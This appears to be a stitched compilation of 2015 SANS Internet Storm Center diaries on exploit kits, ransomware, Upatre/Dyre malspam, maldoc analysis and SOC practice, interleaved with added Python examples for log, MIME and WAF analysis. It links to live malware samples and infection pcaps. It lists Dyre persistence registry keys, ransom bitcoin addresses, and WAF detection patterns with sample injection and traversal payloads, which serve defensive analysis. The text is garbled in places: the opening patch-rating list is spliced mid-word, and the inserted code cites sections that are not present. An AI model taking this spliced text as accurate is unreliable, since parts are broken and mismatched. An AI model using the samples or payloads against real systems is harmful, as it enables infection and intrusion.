| MS15-055 | Vulnerability in Schannel Could Allow Information Disclosure (Replaces MS15-031) | CVE-2015-1716 | KB 3061518 | . | Severity: Important, Exploitability: 1 | Important | Important |
We appreciate updates.
US-based customers can call Microsoft for free patch-related support on 1-866-PCSAFETY
- We use 4 levels:
    - PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    - Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    - Important: Things where more testing and other measures can help.
    - Less Urt practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.
Angler exploit kit pushes new variant of ransomware
Introduction
The Angler exploit kit (EK) is being used to push a new variant of TeslaCrypt/AlphaCrypt ransomware. I've been documenting cases of Angler EK pushing AlphaCrypt in recent weeks [1][2][3]. Last week on 2015-05-07, I started seeing a new variant [4]. This new variant has a popup window that uses CTB-Locker-style instructions.
As seen below, this variant doesn't provide a name for itself in the decrypt instructions.
The same malware sample used a different bitcoin address for each host it infected.
Traffic Characteristics of this New Ransomware Variant
The traffic appears identical to what we've seen with previous infections from TeslaCrypt and AlphaCrypt. A few hours ago I infected a host from a site using Angler EK and received similar alerts from the network traffic.

Shown above: Alerts from monitoring the infection with Security Onion.

Shown above: HTTP traffic from the infection.
A sample of the ransomware can be found at: https://malwr.com/analysis/MjE3ODRlYzc1MmQ2NGUyNDkyYWNkNWM0OWZiOGVjYzE/
I infected 4 different hosts with Angler EK in a 5-hour timeframe and received the same ransomware. It was the same file with the same hash each time. However, the bitcoin address for the ransom payment was different for each infected host. Shown below are decrypt pages from the other 3 hosts:
Here are the bitcoin addresses from these infected hosts:
- 14ctiiDNPLNh2YqmHFaPexAasi6vL5cqKX
- 1K23HDxnozzdfnzgmLeGGUkwyqpPmucnQS
- 1KcYaNQFsSm5hPX36Y855jsjceazoB3MXZ
- 1QJmYhyBWrjCDqvYmk6hh4drpX7NN7TVxq
Pcap files of the infection traffic (Angler EK and the post-infection) are available at:
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-01.pcap
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-02.pcap
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-03.pcap
- http://www.malware-traffic-analysis.net/2015/05/11/2015-05-11-Angler-EK-traffic-example-04.pcap
Final Words
From what I can tell, TeslaCrypt and AlphaCrypt are very similar to CryptoLocker. This new, unnamed variant appears to be another evolution from this family of ransomware.
I've been seeing a lot of Angler EK lately. In recent weeks, more often than not, it's been pushing ransomware. Since 2015-05-07, I've only seen this new variant.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://malware-traffic-analysis.net/2015/04/30/index.html
[2] http://malware-traffic-analysis.net/2015/05/06/index.html
[3] http://malware-traffic-analysis.net/2015/05/07/index.html
[4] http://malware-traffic-analysis.net/2015/05/07/index2.html
SOC Analyst Pyramid
Introduction
Last weekend, I did a 10 minute fireside chat during lunch at BSidesSATX 2015 [1]. It was an informal presentation, where I discussed some of the issues facing security analysts working at an organization's Security Operations Center (SOC).
With only 10 minutes, the largest part of that presentation covered a "SOC analyst pyramid" of activity any organization will encounter.
For the presentation, security analysts are defined as people who monitor their organization's network for near-real-time detection of malicious activity. Security analysts review alerts from their organization's intrusion detection systems (IDS) or security information and event management (SIEM) appliances. These alerts are based on various sources, such as network traffic and event logs.
SOC Analyst Pyramid
Below is a visual representation of this pyramid:
As seen in the image above, the pyramid from top to bottom reads:
- Targeted attacks
- Malicious activity - not blocked
- Malicious activity - blocked or not applicable
- False positives or non-threat
Base of the SOC Analyst Pyramid
The base of the SOC analyst pyramid consists of false positives or valid activity unique to your organization's network. In my years as an analyst, investigating this activity took up the majority of my time. At times, you'll need to document why an alert triggers a false positive, so it can be filtered and allow the team to focus on real suspicious activity.
In my experience, no matter how well-tuned your security monitoring system is, analysts spend most of their time at this level of the pyramid.
Next Tier: Malicious Activity - Blocked or Not Applicable
The next level involves malicious activity that's either blocked or not applicable. Blocked activity includes spam with malware attachments (malspam) blocked by your organization's spam filters. Non-applicable activity includes certain types of scanning. The intent is malicious, but the scans are blind and not applicable to the targeted host. For example, here's a short list of activity from the error logs of a server I run:
That server doesn't run WordPress, nor does it have any sort of web-based administrative login, but I'll find WordPress-based scans hitting the server's IP every day. That shows malicious intent, but it's not applicable.
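One way to make the "blocked or not applicable" tier mechanical is to compare what a request probes for against what the host actually runs. The Python below is an added example (not from the diary and not a Security Onion or SIEM feature): it parses Apache-style access log lines, maps request paths to the software family they fingerprint, and assigns a pyramid tier given an inventory of what is installed. The phpMyAdmin and Tomcat manager paths mirror the honeypot top-10 list earlier on this page; the WordPress paths, the log lines and the inventory set are constructed.

```python
import re
from collections import Counter

# Request-path fingerprints of software that blind scanners probe for.
# phpMyAdmin / Tomcat manager paths are those from the honeypot list above; WordPress ones are constructed.
SCAN_FINGERPRINTS = {
    "wordpress": re.compile(r"^/(wp-login\.php|wp-admin/|xmlrpc\.php)"),
    "phpmyadmin": re.compile(r"^/(phpMyAdmin|pma|myadmin)/scripts/setup\.php"),
    "tomcat-manager": re.compile(r"^/manager/html"),
}

# Common Log Format: client ip, ident, user, [timestamp], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line, installed):
    """Map one access-log line to a pyramid tier.
    installed: set of software families this host really runs.
    Returns (tier, family); family is the matched fingerprint or None."""
    m = LOG_RE.match(line)
    if not m:
        return ("unparsed", None)
    for family, pattern in SCAN_FINGERPRINTS.items():
        if pattern.search(m.group("path")):
            if family not in installed:
                # Malicious intent, but blind: the software is not here. Not applicable.
                return ("malicious-not-applicable", family)
            # The software is present, so the response code decides whether it got anywhere.
            if m.group("status").startswith("2"):
                return ("malicious-not-blocked", family)
            return ("malicious-blocked", family)
    return ("non-threat", None)


def summarize(lines, installed):
    """Count lines per tier; analysts read the top tiers first."""
    return Counter(classify(line, installed)[0] for line in lines)


# Constructed sample log lines (documentation-range source addresses, not real scanners)
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2015:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 404 209',
    '198.51.100.7 - - [12/May/2015:10:01:03 +0000] "POST /xmlrpc.php HTTP/1.1" 404 209',
    '198.51.100.9 - - [12/May/2015:10:05:44 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 209',
    '203.0.113.5 - - [12/May/2015:10:07:10 +0000] "GET /manager/html HTTP/1.1" 401 0',
    '192.0.2.44 - - [12/May/2015:10:09:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
]

if __name__ == "__main__":
    # Assumed inventory for the sample host: it runs Tomcat but neither WordPress nor phpMyAdmin
    for line in SAMPLE_LOG:
        print(classify(line, {"tomcat-manager"}), line.split('"')[1])
    print(summarize(SAMPLE_LOG, {"tomcat-manager"}))
```

The inventory is the part that does the work: the same /manager/html probe is noise on a host without Tomcat and a blocked attempt on one with it, and a 2xx to a present-and-probed component is what should be escalated.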
SOC analysts worried about near-real-time detection of malicious activity generally don't spend much time with this tier of the pyramid.
Next Tier: Malicious Activity - Not Blocked
The next tier of the pyramid involves malicious activity that somehow makes it past your organization's various security measures. This level includes drive-by infections from an exploit kit after viewing a compromised website. Depending on your organization's policies, adware might be an issue. Resolving issues involving adware or potentially unwanted programs (PUP) might give SOC personnel practice for resolving hosts infected with actual malware. Just make sure analysts don't focus on the adware/PUP. The focus of a SOC should always be on malicious activity.
This level of the pyramid is where analysts develop their skill in recognizing malicious activity. Exploit kit traffic might not infect a user's computer. SOC personnel should be able to examine this sort of malicious traffic and determine if a host actually became infected. After an alert, I've seen too many people assume a host was infected without digging in deeper to see what actually happened.
Malware or compromised hosts found at this level of the pyramid are not targeted. This type of malicious activity is a concern for any organization. It's not limited to your employer.
Top of the Pyramid: Targeted Attacks
This tier is where a SOC proves its value to an organization. If bad actors, criminal groups, or hostile foreign agents gain a foothold in your organization's infrastructure, you might not be able to get rid of them. Detecting intrusions early and preventing these bad actors from further access is extremely important. Any number of sources will tell you data breaches are not a matter of "if" but "when" [2][3][4].
Targeted attacks include spear phishing attempts to gather login credentials from specific members. Personnel using a chat system for sales or support can also be targeted. Denial of Service (DoS) attacks or Distributed DoS (DDoS) attacks are usually at this tier. Watering hole attacks [5] are also an issue.
Final Words
I've been a SOC analyst for two employers: one was the government, and the other is private sector. In both cases, I believe the SOC analyst pyramid applies. Feel free to leave a comment, if you have any opinions on the matter.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://www.securitybsides.com/w/page/91978878/BSidesSATX_2015
[2] http://www.securityinfowatch.com/article/12052877/preparing-for-your-companys-inevitable-data-breach
[3] http://www.maslon.com/webfiles/Emails_2015/LegalAlerts/2015_LegalAlert_CyberSecurity_DataBreach_webversion.html
[4] http://www.hechtins.com/blog/data_breach--not_if_but_when.aspx
[5] http://www.trendmicro.com.au/vinfo/au/threat-encyclopedia/web-attack/137/watering-hole-101
Wireshark TCP Flags: How To Install On Windows Video
I was asked how to install the Wireshark TCP Flags dissector, which I wrote about in a diary entry a month ago, on Windows.
To help, I made a video.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
Malicious Word Document: This Time The Maldoc Is A MIME File
Bart Blaze tweeted me a malicious Word document sample (MD5 23a2d596d927ceab01918cc1dfd5db68) that cannot be analyzed with my oledump tool. It turns out to be a MIME file that contains an MSO file, which in turn contains an OLE file. We've seen MSO files containing OLE files before, when we talked about XML Office documents. I've updated my oledump tool (V0.0.15) to handle MSO files directly.
Bart has a blogpost explaining several methods to analyze this file.
If you want to use oledump, first you extract the MSO file from the MIME file, and then you use oledump. If you don't have a tool to handle MIME files, I have one: emldump.py.
Here you can see emldump and oledump piped together to analyze the maldoc:

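The MIME -> MSO -> OLE chain described in this diary, and the "search for the compressed data rather than assume offset 50" change described in the "Another Maldoc?" diary above, can be shown in a few dozen lines. The Python below is an added example and is not the code of emldump or oledump: it decodes the MIME parts with the standard library, keeps those starting with the ActiveMime signature, scans every offset of such a part for a plausible zlib header and inflates from there, and keeps streams that begin with the OLE compound file signature. The MHTML wrapper, the part name editdata.mso and the OLE stand-in bytes are constructed for the example; the 0x40 header length is likewise an assumption chosen so that the stream is not at offset 50.

```python
import base64
import email
import zlib

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file signature
ACTIVEMIME_MAGIC = b"ActiveMime"                    # start of an MSO container


def extract_mso_parts(mime_bytes):
    """Decode every MIME part (base64 / quoted-printable handled by the email module)
    and return the bodies that start with the ActiveMime signature."""
    msg = email.message_from_bytes(mime_bytes)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True)
        if payload and payload.startswith(ACTIVEMIME_MAGIC):
            parts.append(payload)
    return parts


def find_zlib_streams(data):
    """Try to inflate from every offset that carries a plausible zlib header, instead of
    assuming the stream sits at the fixed offset 50. Returns [(offset, bytes)] for
    streams that inflate to completion."""
    found = []
    for off in range(len(data) - 1):
        cmf, flg = data[off], data[off + 1]
        # CMF low nibble 8 = deflate; FCHECK makes CMF*256+FLG a multiple of 31
        if (cmf & 0x0F) != 8 or (cmf * 256 + flg) % 31 != 0:
            continue
        inflater = zlib.decompressobj()
        try:
            out = inflater.decompress(data[off:])
        except zlib.error:
            continue
        if inflater.eof:  # a complete stream, not a lucky header in random bytes
            found.append((off, out))
    return found


def extract_ole_from_mime(mime_bytes):
    """MIME -> MSO part(s) -> zlib stream(s) -> OLE container(s).
    Returns [(offset_within_mso, ole_bytes)]; the OLE bytes are what oledump would analyze."""
    results = []
    for mso in extract_mso_parts(mime_bytes):
        for off, blob in find_zlib_streams(mso):
            if blob.startswith(OLE_MAGIC):
                results.append((off, blob))
    return results


def build_sample_mime(ole_bytes, header_len=0x40):
    """Constructed stand-in for the maldoc: an MHTML wrapper with a base64 MSO part whose
    zlib stream starts at header_len (0x40 by default, deliberately not offset 50)."""
    mso = ACTIVEMIME_MAGIC + b"\x00" * (header_len - len(ACTIVEMIME_MAGIC)) + zlib.compress(ole_bytes)
    b64 = base64.encodebytes(mso).decode("ascii")
    return (
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/related; boundary="----=_NextPart_01"\r\n'
        "\r\n"
        "------=_NextPart_01\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html>constructed sample document</html>\r\n"
        "------=_NextPart_01\r\n"
        "Content-Location: file:///C:/editdata.mso\r\n"
        "Content-Transfer-Encoding: base64\r\n"
        "Content-Type: application/x-mso\r\n"
        "\r\n" + b64 +
        "------=_NextPart_01--\r\n"
    ).encode("ascii")


# Constructed OLE stand-in: a valid signature followed by filler in place of the real streams
SAMPLE_OLE = OLE_MAGIC + b"\x00" * 504 + b"constructed VBA project placeholder"

if __name__ == "__main__":
    for off, ole in extract_ole_from_mime(build_sample_mime(SAMPLE_OLE)):
        print("OLE container found at MSO offset 0x%x, %d bytes" % (off, len(ole)))
```

On a real sample, feed the .xls or .doc bytes to extract_ole_from_mime and hand each returned blob to oledump; the offset scan is what keeps the extraction working when the next wave moves the stream again.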
Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
Security Awareness? How do you keep your staff safe?
If you’ve been following recent diaries from my fellow handlers Brad and Manuel, they peel the covers back on a couple of current malicious email campaigns. Many readers of the Storm Center diaries will be used to the ebb and flow of these stories. Here in Australia there’s a speeding fine scam email [1] that’s been running for the last few weeks, and there’s no indication it will drop off any time soon.
There is plenty of training, education and horror stories out on the Internet about malicious email, so why is it a recurring problem? One suggestion has been that it plays on human emotions. Threatening or enticing emails are designed to draw in the unsuspecting, and then there are those users that will go to significant lengths to bypass security controls just to see the dancing cat/chicken/Han Solo.
So providing useful and meaningful security awareness isn’t easy and has to be made relevant to individual audiences, even within the same organization. Providing the same training education to senior management and then a development group will probably miss the mark for both groups and result in a “Meh, I won’t fall for that”. Sadly generic security training often results in a trained staff member that still falls victim to a relatively convincing scam.
At this point you’d be expecting some wondrous solution. Sorry, not today. I will say this is something that takes constant revising, effort and innovative thinking to engage your staff. I’ve mentioned before that SANS has some nifty resources [2], but I really love finding how people try to instill security in their organizations. A security engineer from Riot Games posted how his security team took a different approach to getting in the hearts and minds of their staff about thinking about security as a whole [3]. This goes back to build a story about being security minded that your audience understands, hopefully cares about, and starts to adopt in their working practices and lives.
Will it stop everyone clicking links or opening random email attachments? I doubt it, but flipping a person from an attack vector to an attack alerter is a worthy goal.
If you have any other examples of innovative ways of getting people to care about good, basic security approaches, please add a comment or drop us a line [4].
[1] https://www.service.nsw.gov.au/news/afp-warns-public-email-traffic-infringement-scam
[2] http://www.securingthehuman.org/resources/
[3] http://blog.markofu.com/2015/01/socialising-security-riot.html
[4] https://isc.sans.edu/contact.html
Chris Mohan --- Internet Storm Center Handler on Duty
The Art of Logging
[This is a Guest Diary by Xavier Mertens]
Handling log files is not a new topic. For a long time, people have known that taking care of your logs is a must. They are very valuable when you need to investigate an incident. But if collecting events and storing them for later processing is one point, events must also be properly generated to be able to investigate suspicious activities! Take a firewall as an example... Logging all the accepted traffic is one step, but what's really important is to log all the rejected traffic. Most modern security devices (IDS, firewalls, web application firewalls, ...) can integrate dynamic blocklists maintained by external organizations. There are plenty of useful blocklists on the internet with IP addresses, domain names, etc. It's quite easy to add a rule on top of your security policy which says:
if (source_ip in blocklist):
    drop_traffic()
with the "blocklist" table being populated by an external process. Usually, this rule is defined at the beginning of the security policy for performance reasons. Very efficient, but is it the right place?
Let's assume a web application firewall which has this kind of feature. It will drop all connections from a (reported as) suspicious IP address right at the beginning, without further details. Let's put the blocklist rule at the end of the policy of our WAF instead. We now have something like this:
if (detected_attack(pattern1)):
    drop_traffic()
elif (detected_attack(pattern2)):
    drop_traffic()
elif (detected_attack(pattern3)):
    drop_traffic()
elif (source_ip in blocklist):
    drop_traffic()
If we block the malicious IP addresses at the beginning of the policy, we'll never know which kind of attack has been tried. By blocking our malicious IP addresses at the end, we know that if one IP is blocked, our policy was not effective enough to block the attack! Maybe a new type of attack was tried and we need to add a new pattern. Blocking attackers is good but it's more valuable to know why they were blocked…
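To see the difference in the logs rather than in prose, here is an added example in Python (not part of the guest diary and not any real WAF's rule engine). The same three requests from a blocklisted address are run through the policy twice, once with the blocklist evaluated first and once with it evaluated last, and the reason recorded for each drop is counted. The attack patterns, the blocklist entry and the requests are deliberately simple constructed samples.

```python
import re
from collections import Counter

# Constructed attack signatures standing in for the WAF's pattern1..pattern3
PATTERNS = {
    "sqli": re.compile(r"(?i)(union\s+select|'\s*or\s+1=1)"),
    "xss": re.compile(r"(?i)<script\b"),
    "path-traversal": re.compile(r"\.\./"),
}

# Constructed sample entry standing in for the externally maintained blocklist table
BLOCKLIST = {"198.51.100.23"}


def evaluate(request, blocklist_first):
    """Run the policy for one request and return (action, reason).
    The reason is the rule that fired, i.e. what ends up in the log: evaluation
    order decides whether that is the attack pattern or merely 'blocklist'."""
    src, url = request["src"], request["url"]
    if blocklist_first and src in BLOCKLIST:
        return ("drop", "blocklist")            # the attack, if any, is never identified
    for name, pattern in PATTERNS.items():
        if pattern.search(url):
            return ("drop", name)               # logged with the pattern that caught it
    if src in BLOCKLIST:
        return ("drop", "blocklist")            # blocklist as the last line of defence
    return ("accept", None)


def policy_report(requests, blocklist_first):
    """Count the logged reason per dropped request. With the blocklist last, every
    'blocklist' entry means no pattern matched: a candidate for a new signature."""
    decisions = (evaluate(r, blocklist_first) for r in requests)
    return Counter(reason for action, reason in decisions if action == "drop")


# Constructed requests: three from the blocklisted address (two known attack shapes and one
# the patterns do not cover) and one benign request from elsewhere.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.23", "url": "/search?q=1' or 1=1--"},
    {"src": "198.51.100.23", "url": "/download?f=../../config.ini"},
    {"src": "198.51.100.23", "url": "/api/v2/export?fmt=unexpected"},
    {"src": "203.0.113.8", "url": "/index.html"},
]

if __name__ == "__main__":
    print("blocklist first:", dict(policy_report(SAMPLE_REQUESTS, blocklist_first=True)))
    print("blocklist last: ", dict(policy_report(SAMPLE_REQUESTS, blocklist_first=False)))
```

With the blocklist first, the report reads "blocklist: 3" and nothing else; with it last, two drops are attributed to known patterns and the single remaining "blocklist" drop is the one worth a closer look, which is the diary's point.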
Upatre/Dyre - the daily grind of botnet-based malspam
Malicious spam (malspam) delivering Upatre/Dyre has been an ongoing issue for quite some time. Many organizations have posted articles about this malware. I've read good information on Dyre last year [1, 2] and this year [3].
Upatre is the malware downloader that retrieves Dyre (Dyreza), an information stealer described as a "Zeus-like banking Trojan" [4]. Earlier this year, EmergingThreats reported Upatre and Dyre are under constant development [5], while SecureWorks told us banking botnets continue to deliver this malspam despite previous takedowns [6].
Botnets sending waves of malspam with Upatre as zip file attachments are a near-daily occurrence. Most organizations won't see these emails, because the messages are almost always blocked by spam filters.
Because security researchers find Upatre/Dyre malspam nearly every day, it's a bit tiresome to write about, and we sometimes gloss over the information when it comes our way. After all, the malspam is being blocked, right?
Nonetheless, we should continue to document some waves of Upatre/Dyre malspam to see if anything is changing or evolving.
Here's one wave we found after searching through our blocked spam filters at Rackspace within the past 24 hours:
- Start date/time: 2015-05-04 13:48 UTC
- End date/time: 2015-05-04 16:40 UTC
- Timespan: 2 hours and 52 minutes
- Number of emails: 212
We searched for subject lines starting with the word "Holded" and found 31 different subjects:
- Holded account alert
- Holded account caution
- Holded account message
- Holded account notification
- Holded account report
- Holded account warning
- Holded bank operation alert
- Holded bank operation caution
- Holded bank operation message
- Holded bank operation notification
- Holded bank operation report
- Holded bank operation warning
- Holded operation alert
- Holded operation caution
- Holded operation message
- Holded operation notification
- Holded operation report
- Holded operation warning
- Holded payment alert
- Holded payment caution
- Holded payment message
- Holded payment notification
- Holded payment report
- Holded payment warning
- Holded transaction alert
- Holded transaction caution
- Holded transaction message
- Holded transaction notification
- Holded transaction report
- Holded transaction warning
The 212 messages had different attachments. Here's a small sampling of the different file names:
- abrogation_warning_information.zip
- block_alert_data.zip
- block_alert_document.zip
- block_alert_report.zip
- block_message_data.zip
- block_message_statement.zip
- cancelation_notification_data.zip
- cancelation_notification_details.zip
- invalidation_notification_details.zip
- invalidation_notification_document.zip
- nullfication_alert_report.zip
- nullfication_message_information.zip
- rejection_message_data.zip
- rejection_notification_details.zip
- rejection_warning_details.zip
- rejection_warning_report.zip
Emails sent by this botnet came from different IP addresses before they hit our mail servers. Senders and message ID headers were all spoofed. Each of the email headers show the same Google IP address spoofed as the previous sender. In the images below, the source IP address--right before the message hit our email servers--is outlined in red. The spoofed Google IP address is highlighted in blue. The only true items are the IP addresses before these emails hit our mail servers. Everything else is cannot be verified and can be considered fake.
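Picking the one trustworthy hop out of the Received: chain is a routine triage step, so here it is as an added Python example (not from the diary, not Rackspace tooling). The message is a constructed stand-in for one of the 212: the upper Received: header was stamped by our own MX and records the peer that really connected; the lower one, naming a Google relay, was written by the sender and is exactly the part that cannot be verified. The mail server names, the 198.51.100.77 source and the claimed Google address are all constructed.

```python
import email
import re

# Constructed sample message, modelled on the wave's headers; not one of the real emails.
SAMPLE_MSG = b"""Received: from mail.example.net (unknown [198.51.100.77])
\tby mx1.example.org (Postfix) with ESMTP id 4ABC123
\tfor <victim@example.org>; Mon,  4 May 2015 13:52:10 +0000 (UTC)
Received: from mail-qg0-f42.google.com (mail-qg0-f42.google.com [209.85.192.42])
\tby mail.example.net with ESMTP; Mon,  4 May 2015 13:51:58 +0000
From: "Bank Alerts" <alerts@example.com>
To: victim@example.org
Subject: Holded account alert
Message-ID: <20150504135158.12345@mail.example.net>

Your account is holded. See attached.
"""

# Assumed for the example: hostnames our own mail servers write into "by ..." clauses
OUR_MX = {"mx1.example.org"}

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
BY_HOST = re.compile(r"\bby\s+(\S+)")


def received_hops(raw):
    """Return Received: headers top-down (most recent hop first) as (by_host, from_ip)."""
    msg = email.message_from_bytes(raw)
    hops = []
    for header in msg.get_all("Received", []):
        header = re.sub(r"\s+", " ", header)         # unfold continuation lines
        by = BY_HOST.search(header)
        ip = IP_IN_BRACKETS.search(header)
        hops.append((by.group(1) if by else None, ip.group(1) if ip else None))
    return hops


def true_source_ip(raw):
    """The only hop we can trust is the first one stamped by our own MX; return the
    peer address it recorded. Anything below it in the chain is sender-controlled."""
    for by_host, from_ip in received_hops(raw):
        if by_host in OUR_MX:
            return from_ip
    return None


def unverified_hops(raw):
    """Hops below our MX's stamp: recorded for context only, never used as evidence."""
    hops = received_hops(raw)
    idx = next((i for i, (by_host, _) in enumerate(hops) if by_host in OUR_MX), len(hops) - 1)
    return hops[idx + 1:]


if __name__ == "__main__":
    print("true source:", true_source_ip(SAMPLE_MSG))
    print("claimed, unverifiable:", unverified_hops(SAMPLE_MSG))
```

The source to block or report is the one true_source_ip returns; the Google address below it is the "spoofed previous sender" the diary highlights in blue.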
This wave sent dozens of different attachment names with hundreds of different file hashes. I took a random sample and infected a host to generate some traffic. This Dyre malware is VM-aware, so I had to use a physical host for the infection traffic. It shows the usual Upatre URLs, Dyre SSL certs and STUN traffic we've seen before with Upatre/Dyre.

Shown above: Filtered Wireshark display of the pcap showing the infection traffic.

Shown above: EmergingThreats-based Snort events on the infection traffic using Security Onion.
Of note, icanhazip.com is a service run by one of my fellow Rackspace employees [7]. By itself, it's not malicious. icanhazip.com is merely a free service that reports your host's IP address. Unfortunately, malware authors use this and similar services to check an infected computer's IP address. Because of that, you'll often find alerts that report any traffic to these domains as an indicator of compromise (IOC).
The Upatre HTTP GET requests didn't return anything. Apparently, the follow-up Dyre malware was downloaded over one of the SSL connections. Here's what I grabbed off the infected host:
Dyre first saved to:  C:\Users\username\AppData\Local\Temp\vwlsrAgtqYXVcRW.exe
Dyre was then moved to:  C:\Windows\vwlsrAgtqYXVcRW.exe
Registry keys for persistence:
Key name: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\googleupdate
Key name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\googleupdate
Value name: ImagePath
Value type: REG_EXPAND_SZ
Value data: C:\Windows\vwlsrAgtqYXVcRW.exe
A pcap of the infection traffic is available at:
http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-traffic.pcap.zip
A zip file of the associated Upatre/Dyre sample is available at:
http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-malware-sample.zip
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
Final words
It's a daily grind reviewing this information, and most security professionals have higher priority issues to deal with. However, if we don't periodically review these waves of Upatre/Dyre, our front-line analysts and other security personnel might not recognize the traffic and may miss the IOCs.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] https://www.us-cert.gov/ncas/alerts/TA14-300A
[2] http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
[3] http://securityintelligence.com/dyre-wolf/
[4] http://www.networkworld.com/article/2878966/microsoft-subnet/dyre-banking-trojan-tweaked-to-spread-upatre-malware-via-microsoft-outlook.html
[5] http://www.emergingthreats.net/about-us/blog/dyre-upatre-constant-development
[6] http://www.secureworks.com/cyber-threat-intelligence/threats/banking-botnets-persist-despite-takedowns/
[7] https://major.io/icanhazip-com-faq
Traffic pattern change noted in Fiesta exploit kit
A few hours ago, Jerome Segura, Senior Security Researcher at Malwarebytes, tweeted about a change in traffic patterns from Fiesta exploit kit (EK) [1].
What had been semi-colons in the URLs from Fiesta EK are now commas. Here's what we saw from my previous diary on Fiesta EK last week [2]:
Here's what I saw from infecting a host with Fiesta EK a short while ago:
Any signatures for detecting Fiesta EK that depend on those semi-colons will need to be updated.
A pcap of the traffic is available at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-traffic.pcap.zip, and a zip file of the associated malware is at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-malware.zip
The ZIP file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
I checked out the payload from this infection, and it has a digital signature spoofing Microsoft.
Didn't get any traffic out of the malware payload from publicly-available malware analysis tools:
- https://malwr.com/analysis/MzQzYzNlMTQ0ODEzNDNjZmJjOTJhYjJjYTg2MmI2Yzc/
- https://www.hybrid-analysis.com/sample/67a3a6a3924e7e013b888350e1ff106faf665ccd191d21cb6b19b235e83d2aa5?environmentId=1 (Win 7 32-bit)
- https://www.hybrid-analysis.com/sample/67a3a6a3924e7e013b888350e1ff106faf665ccd191d21cb6b19b235e83d2aa5?environmentId=2 (Win 7 64-bit)
While generating traffic for my previous diary on Fiesta EK, I saw 3 different payloads within a 2 hour period. Every once in a while, I've seen digital signatures from Fiesta EK malware payloads, but I'm not sure what this particular payload is. Haven't really had time to analyze it. If anyone does have time, please leave a comment.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] https://twitter.com/jeromesegura/status/595002036027985921
[2] https://isc.sans.edu/diary/Actor+using+Fiesta+exploit+kit/19631
VolDiff, for memory image differential analysis
VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution providing a differential analysis, helping identify IOCs and understand advanced malware behaviour. 
I had intended to include it in my latest toolsmith article, Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem, but quite literally ran out of space and time. 
Using WinPmem, as part of Rekall and GRR offerings, you can acquire two memory images, one clean image prior to infection or compromise, and one after buggering your target system.
As you'll note in the article, I compromised a Windows 7 x64 SP1 VM with a PowerShell one-two punch, the vast majority of which occurred in-memory only. While documenting the related activities for the column, I also took before and after images for VolDiff testing as follows:
winpmem_1.6.2.exe baseline.raw, and after pwnzorship, winpmem_1.6.2.exe compromised.raw.
I then ran ./VolDiff.sh baseline.raw compromised.raw Win7SP1x64 on my Ubuntu server and bingo, after much time and ado (VolDiff takes a while to be sure), out popped VolDiff-report.txt.
To summarize briefly from the article, the malfeasance I unleashed against that poor, unsuspecting VM was all executed in the context of powershell.exe. To that end, did the VolDiff results corroborate the findings achieved with Rekall? Absolutely! Note that the suspicious PIDs from the article are 1284 and 2396. You'll spot them prominently in the following snippets of affirmation:
Volatility analysis report generated by VolDiff v0.9.3.
Download the latest version from https://github.com/aim4r/VolDiff/.
Suspicious new netscan entries
===========================================================================
0x13c8993d0        UDPv4    0.0.0.0:0    *:*                                   2396     powershell.exe 2015-04-26 17:56:08 UTC+0000
0x13e81acb0        UDPv4    0.0.0.0:0    *:*                                   1284     powershell.exe 2015-04-26 18:17:33 UTC+0000
Suspicious new pslist entries
===========================================================================
0xfffffa8031da1400 cmd.exe                1676   2396      0 --------      1      0 2015-04-26 18:11:52 UTC+0000   2015-04-26 18:15:50 UTC+0000  
0xfffffa8033b17060 powershell.exe         2604   1676      5      250      1      1 2015-04-26 18:12:58 UTC+0000  
0xfffffa80322c2060 cmd.exe                2912   1284      0 --------      1      0 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0xfffffa8032407460 powershell.exe         1984   2912      6      235      1      0 2015-04-26 19:18:20 UTC+0000                                 
Suspicious new psscan entries
===========================================================================
